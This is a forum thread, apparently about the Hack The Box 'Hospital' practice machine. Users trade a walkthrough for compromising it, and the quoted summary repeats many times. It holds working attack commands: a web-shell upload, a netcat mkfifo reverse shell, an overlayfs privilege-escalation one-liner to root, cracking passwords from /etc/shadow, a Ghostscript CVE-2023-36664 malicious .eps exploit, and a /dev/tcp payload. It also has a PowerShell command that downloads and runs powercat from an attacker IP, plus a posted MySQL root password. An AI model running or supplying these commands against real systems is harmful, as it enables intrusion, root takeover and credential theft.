Posts: 56
Threads: 4
Joined: Sep 2023
Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
Posts: 34
Threads: 2
Joined: Sep 2023
(Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
not really helpful for me 
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 12:47 AM)blade33 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
not really helpful for me what user on what machine are you? just answer my question and i´ll help..
Posts: 134
Threads: 13
Joined: Sep 2023
(Nov 19, 2023, 12:47 AM)blade33 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
not really helpful for me
did you look in the dir you landied in?
Posts: 34
Threads: 2
Joined: Sep 2023
(Nov 19, 2023, 12:52 AM)take1312 Wrote: (Nov 19, 2023, 12:47 AM)blade33 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
not really helpful for me what user on what machine are you? just answer my question and i´ll help..
i did. hospital\drbrown on windows.
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 12:54 AM)blade33 Wrote: (Nov 19, 2023, 12:52 AM)take1312 Wrote: (Nov 19, 2023, 12:47 AM)blade33 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
not really helpful for me what user on what machine are you? just answer my question and i´ll help..
i did. hospital\drbrown on windows.
check your pm
Posts: 20
Threads: 0
Joined: Oct 2023
(Nov 18, 2023, 09:33 PM)VfV Wrote: Guys? I can't access the mysql, even with the credentials, it says access denied while I'm trying
mysql -u root -password my$qls3rv1c3! -D hospital
Also, how did u went from that webshell to revshell?
I can't go full TTY with the ctrl+Z thing if it's in the web
you should escape the \$
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 01:25 AM)Miranda0315 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
That's awsome!!
I used the cve and created a .esp file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply the eamil. but did not get the reverse shell. did I do anything wrong??
ye you are doing sth wrong
when using --reverse it uses this, which is for linux, while you try to get a rev shell on windows:
def generate_rev_shell_payload(ip, port):
payload = f"UNIX_REV_SHELL_PAYLOAD=f\"0<&196;exec 196<>/dev/tcp/{ip}/{port}; sh <&196 >&196 2>&196\""
return payload
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 01:29 AM)Miranda0315 Wrote: (Nov 19, 2023, 01:25 AM)Miranda0315 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
That's awsome!!
I used the cve and created a .esp file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply the eamil. but did not get the reverse shell. did I do anything wrong?? I know the reason now LOL
Thank you
python3 CVE_2023_36664_exploit.py --inject --payload " payloadhere" --filename file.eps
i used powershell3 base64
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 01:39 AM)Miranda0315 Wrote: (Nov 19, 2023, 01:27 AM)take1312 Wrote: (Nov 19, 2023, 01:25 AM)Miranda0315 Wrote: (Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
That's awsome!!
I used the cve and created a .esp file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply the eamil. but did not get the reverse shell. did I do anything wrong??
ye you are doing sth wrong
when using --reverse it uses this, which is for linux, while you try to get a rev shell on windows:
def generate_rev_shell_payload(ip, port):
payload = f"UNIX_REV_SHELL_PAYLOAD=f\"0<&196;exec 196<>/dev/tcp/{ip}/{port}; sh <&196 >&196 2>&196\""
return payload I changed to this now
python3 exploit.py --generate --payload 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.8/powercat.ps1');powercat -c 10.10.14.8 -p 4444 -e cmd"' --filename file --extension eps
still doesn't work
just read my last post maybe?
|
